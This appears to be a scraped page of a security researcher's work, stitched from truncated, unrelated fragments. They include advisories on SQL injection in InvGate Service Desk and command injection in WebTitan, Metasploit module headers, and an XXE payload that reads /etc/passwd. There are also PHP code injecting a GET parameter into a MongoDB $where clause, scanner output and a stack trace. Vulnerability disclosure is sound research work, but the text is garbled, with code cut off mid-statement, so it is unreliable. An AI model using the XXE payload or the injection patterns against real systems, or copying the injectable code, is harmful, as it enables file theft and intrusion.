Brandon Perry (brandonprry)
InvGate Service Desk v4.2.36 multiple vulnerabilities
http://www.invgate.com/en/service-desk/
http://www.invgate.com/en/service-desk/on-premise-trial/
InvGate Service Desk suffers from many SQL injections exploitable as an authenticated but non-privileged
(end-user role) user. Most are also stacked injections, so an attacker also has the ability to
modify any of the data in the database. The payloads used to determine exploitability are in the
sqlmap payload output, but each was verified to be able to enumerate the current database,
current user, and an assortment of other things. These were tested with an ‘end-user’ user.
bperry@w00den-pickle:~/tools/msf_dev$ ./msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<wsdl:definitions xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/" xmlns:tns="http://www.webserviceX.NET/"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:s="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://schemas.xmlsoap.org/wsdl/soap12/" xmlns:http="http://schemas.xmlsoap.org/wsdl/http/" targetNamespace="http://www.webserviceX.NET/"
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
Rank = GoodRanking
<?php
$m = new MongoClient("mongodb://127.0.0.1:27017");
$m->selectDB('foo');
$collection = $m->selectCollection('test', 'phpmanual');
if ($_GET["age"] != "") {
$js = 'function(){if(this.name == "Joe"||this.age=='.$_GET["age"].')return true;}';
$cursor = $collection->find(array('$where' => $js));
foreach($cursor as $doc) {
bperry@w00den-pickle:~/tmp/discourse$ brakeman
WARNING: --------------------------------------------------------------------------
You are running an old version of bundler, please update by running: gem install bundler
Loading scanner...
[Notice] Detected Rails 3 application
Processing application in /home/bperry/tmp/discourse
Processing gems...
Processing configuration...
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@brandonprry
brandonprry / gist:2e73acd63094fa2a4f63
Last active August 29, 2015 14:00
Sometimes the module is too fast and fails to change the root password. Just run it again.
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'json'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
at Mono.CSharp.CSharpCodeCompiler.CompileFromFileBatch (System.CodeDom.Compiler.CompilerParameters options, System.String[] fileNames) [0x00135] in /private/tmp/source/bockbuild-mono-3.2.6/profiles/mono-mac-xamarin/build-root/mono-3.2.6/mcs/class/System/Microsoft.CSharp/CSharpCodeCompiler.cs:236
at Mono.CSharp.CSharpCodeCompiler.CompileAssemblyFromFileBatch (System.CodeDom.Compiler.CompilerParameters options, System.String[] fileNames) [0x00011] in /private/tmp/source/bockbuild-mono-3.2.6/profiles/mono-mac-xamarin/build-root/mono-3.2.6/mcs/class/System/Microsoft.CSharp/CSharpCodeCompiler.cs:135
at System.CodeDom.Compiler.CodeDomProvider.CompileAssemblyFromFile (System.CodeDom.Compiler.CompilerParameters options, System.String[] fileNames) [0x00014] in /private/tmp/source/bockbuild-mono-3.2.6/profiles/mono-mac-xamarin/build-root/mono-3.2.6/mcs/class/System/System.CodeDom.Compiler/CodeDomProvider.cs:111
at System.Web.Compilation.AssemblyBuilder.BuildAssembly (System.Web.VirtualPath virtualPath, System
WebTitan 4.01 (build 148) multiple vulnerabilities
http://www.webtitan.com/free-trial
WebTitan suffers from many command injection attacks, which is exacerbated by the fact that the “role-based” access is superficial only. An attacker with any credentials to the system can execute remote commands as a variety of local users. An authorized attacker can also take advantage of a directory traversal attack as the ‘www’ user and read arbitrary files. The application seems to only change what it displays to the users based on their roles, but these limited users can still successfully perform any request an “admin” can perform.
Because of these vulnerabilities, in the worst case scenario, a limited-access authorized user can eventually run commands remotely as the root user.